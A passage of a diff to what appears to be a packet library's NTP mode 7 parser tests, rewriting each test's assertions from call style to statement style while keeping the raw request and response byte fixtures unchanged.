b'\x97\x00\x03\x1d@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 29) -assert(p.err == 4) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 29 +assert p.err == 4 +assert p.nb_items == 0 +assert p.data_item_size == 0 = NTP Private (mode 7) - REQ_PEER_LIST (1) - request s = b'\x17\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 0) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 0 +assert p.nb_items == 0 +assert p.data_item_size == 0 = NTP Private (mode 7) - REQ_PEER_LIST (2) - response s = b'\x97\x00\x03\x00\x00\x01\x00 \x7f\x7f\x01\x00\x00{\x03\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 0) -assert(p.nb_items == 1) -assert(p.data_item_size == 32) -assert(type(p.data[0]) == NTPInfoPeerList) -assert(p.data[0].addr) == "127.127.1.0" -assert(p.data[0].port) == 123 +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 0 +assert p.nb_items == 1 +assert p.data_item_size == 32 +assert type(p.data[0]) == NTPInfoPeerList +assert p.data[0].addr == "127.127.1.0" +assert p.data[0].port == 123 = NTP Private (mode 7) - REQ_PEER_INFO (1) - request s = b'\x17\x00\x03\x02\x00\x01\x00 \xc0\xa8zf\x00{\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 2) -assert(p.nb_items == 1) -assert(p.data_item_size == 32) -assert(isinstance(p.req_data[0], NTPInfoPeerList)) -assert(p.req_data[0].addr == "192.168.122.102") -assert(p.req_data[0].port == 123) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 2 +assert p.nb_items == 1 +assert p.data_item_size == 32 +assert isinstance(p.req_data[0], NTPInfoPeerList) +assert p.req_data[0].addr == "192.168.122.102" +assert p.req_data[0].port == 123 = NTP Private (mode 7) - REQ_PEER_INFO (2) - response s = b'\x97\x00\x03\x02\x00\x01\x01\x18\xc0\xa8zf\xc0\xa8ze\x00{\x01\x03\x01\x00\x10\x06\n\xea\x04\x00\x00\xaf"\x00"\x16\x04\xb3\x01\x00\x00\x00\x00\x00\x00\x00INIT\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x82\x9d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb<\x8d\xc5\xde\x7fB\x89\xdb<\x8d\xc5\xde\x7fB\x89\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 2) -assert(isinstance(p.data[0], NTPInfoPeer)) -assert(p.data[0].dstaddr == "192.168.122.102") -assert(p.data[0].srcaddr == "192.168.122.101") -assert(p.data[0].srcport == 123) -assert(p.data[0].associd == 1203) -assert(p.data[0].keyid == 1) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 2 +assert isinstance(p.data[0], NTPInfoPeer) +assert p.data[0].dstaddr == "192.168.122.102" +assert p.data[0].srcaddr == "192.168.122.101" +assert p.data[0].srcport == 123 +assert p.data[0].associd == 1203 +assert p.data[0].keyid == 1 = NTP Private (mode 7) - REQ_PEER_LIST_SUM (1) - request s = b'\x17\x00\x03\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 1) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 1 = NTP Private (mode 7) - REQ_PEER_LIST_SUM (2) - response (1st packet) s = b'\xd7\x00\x03\x01\x00\x06\x00H\n\x00\x02\x0f\xc0\x00\x02\x01\x00{\x10\x06\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\x0f\xc0\x00\x02\x02\x00{\x10\x06\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x01\x02\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\x0f\xc0\xa8d\x01\x00{\x10\x07\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth0\xc0\xa8zg\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\x0f\xc0\xa8d\x02\x00{\x10\x07\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x02\xc0\xa8zh\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\n\x00\x02\x0f\xc0\xa8d\r\x00{\x10\x07\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8zk\x00{\x01\x01\xc0\xa8ze\xc0\xa8zf\x00{\x0b\x06\x07\xf4\x83\x01\x00\x00\x07\x89\x00\x00\x00\x007\xb1\x00h\x00\x00o?\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8zm\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 1) -assert(isinstance(x, NTPInfoPeerSummary) for x in p.data) -assert(p.data[0].srcaddr == "192.0.2.1") +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 1 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 1 +assert (isinstance(x, NTPInfoPeerSummary) for x in p.data) +assert p.data[0].srcaddr == "192.0.2.1" = NTP Private (mode 7) - REQ_PEER_LIST_SUM (3) - response (2nd packet) s = b'\xd7\x01\x03\x01\x00\x06\x00H\xc0\xa8ze\xc0\xa8zg\x00{\x10\x08\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8ze\xc0\xa8zg\x00{\x10\x08\n\x00\x11\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x01\x02\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8ze\xc0\xa8zh\x00{\x10\x08\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth0\xc0\xa8zg\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8ze\xc0\xa8zi\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x02\xc0\xa8zh\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc0\xa8ze\xc0\xa8zj\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8zk\x00{\x01\x01\xc0\xa8ze\xc0\xa8zk\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8zm\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 1) -assert(isinstance(x, NTPInfoPeerSummary) for x in p.data) -assert(p.data[0].srcaddr == "192.168.122.103") +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 1 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 1 +assert (isinstance(x, NTPInfoPeerSummary) for x in p.data) +assert p.data[0].srcaddr == "192.168.122.103" = NTP Private (mode 7) - REQ_PEER_LIST_SUM (3) - response (3rd packet) s = b'\x97\x02\x03\x01\x00\x02\x00H\xc0\xa8ze\xc0\xa8zl\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8ze\xc0\xa8zm\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x01\x02\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 1) -assert(isinstance(x, NTPInfoPeerSummary) for x in p.data) -assert(p.data[0].srcaddr == "192.168.122.108") +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 1 +assert (isinstance(x, NTPInfoPeerSummary) for x in p.data) +assert p.data[0].srcaddr == "192.168.122.108" = NTP Private (mode 7) - REQ_PEER_STATS (1) - request s = b'\x17\x00\x03\x03\x00\x01\x00 \xc0\xa8ze\x00{\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 3) -assert(isinstance(p.req_data[0], NTPInfoPeerList)) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 3 +assert isinstance(p.req_data[0], NTPInfoPeerList) = NTP Private (mode 7) - REQ_PEER_STATS (2) - response s = b'\x97\x00\x03\x03\x00\x01\x00x\xc0\xa8zf\xc0\xa8ze\x00{\x00\x01\x01\x00\x10\x06\x00\x00\x00)\x00\x00\x00\x1e\x00\x02\xda|\x00\x00\x00\xbc\x00\x00\x00\x00\x00\x00\x0b\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nJ\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x07\x00\x00\x00\x00\xde\x7fB\x89\x00<\x8d\xc5\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 3) -assert(isinstance(x, NTPInfoPeerStats) for x in p.data) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 3 +assert (isinstance(x, NTPInfoPeerStats) for x in p.data) = NTP Private (mode 7) - REQ_SYS_INFO (1) - request s = b'\x17\x00\x03\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 4) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 4 = NTP Private (mode 7) - REQ_SYS_INFO (2) - response s = b'\x97\x00\x03\x04\x00\x01\x00P\x7f\x7f\x01\x00\x03\x00\x0b\xf0\x00\x00\x00\x00\x00\x00\x03\x06\x7f\x7f\x01\x00\xdb<\xca\xf3\xa1\x92\xe1\xf7\x06\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x07\x00\x00\x00\x00\xde\x7fB\x89\x00<\x8d\xc5' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 4) -assert(isinstance(p.data[0], NTPInfoSys)) -assert(p.data[0].peer == "127.127.1.0") -assert(p.data[0].peer_mode == 3) -assert(p.data[0].leap == 0) -assert(p.data[0].stratum == 11) -assert(p.data[0].precision == 240) -assert(p.data[0].refid == "127.127.1.0") +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 4 +assert isinstance(p.data[0], NTPInfoSys) +assert p.data[0].peer == "127.127.1.0" +assert p.data[0].peer_mode == 3 +assert p.data[0].leap == 0 +assert p.data[0].stratum == 11 +assert p.data[0].precision == 240 +assert p.data[0].refid == "127.127.1.0" = NTP Private (mode 7) - REQ_SYS_STATS (1) - request s = b'\x17\x00\x03\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 5) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 5 = NTP Private (mode 7) - REQ_SYS_STATS (2) - response s = b'\x97\x00\x03\x05\x00\x01\x00,\x00\x02\xe2;\x00\x02\xe2;\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b%\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b%\x00\x00\x00\x00\x00\x00\x0b=\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 5) -assert(isinstance(p.data[0], NTPInfoSysStats)) -assert(p.data[0].timeup == 188987) -assert(p.data[0].received == 2877) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 5 +assert isinstance(p.data[0], NTPInfoSysStats) +assert p.data[0].timeup == 188987 +assert p.data[0].received == 2877 = NTP Private (mode 7) - REQ_IO_STATS (1) - request s = b'\x17\x00\x03\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 6) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 6 = NTP Private (mode 7) - REQ_IO_STATS (2) - response s = b'\x97\x00\x03\x06\x00\x01\x00(\x00\x00\x03\x04\x00\n\x00\t\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00J\x00\x00\x00\xd9\x00\x00\x00\x00\x00\x00\x00J\x00\x00\x00J' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 6) -assert(p.data[0].timereset == 772) -assert(p.data[0].sent == 217) +assert isinstance(p, NTPPrivate) +assert p.response == 1 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 6 +assert p.data[0].timereset == 772 +assert p.data[0].sent == 217 = NTP Private (mode 7) - REQ_MEM_STATS (1) - request s = b'\x17\x00\x03\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.more == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 7) +assert isinstance(p, NTPPrivate) +assert p.response == 0 +assert p.more == 0 +assert p.version == 2 +assert p.mode == 7 +assert p.request_code == 7 = NTP Private (mode 7) - REQ_MEM_STATS (2) - response s = b'\x97\x00\x03\x07\x00\x01\x00\x94\x00\x00\n\xee\x00\x0f\x00\r\x00\x00\x00<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more 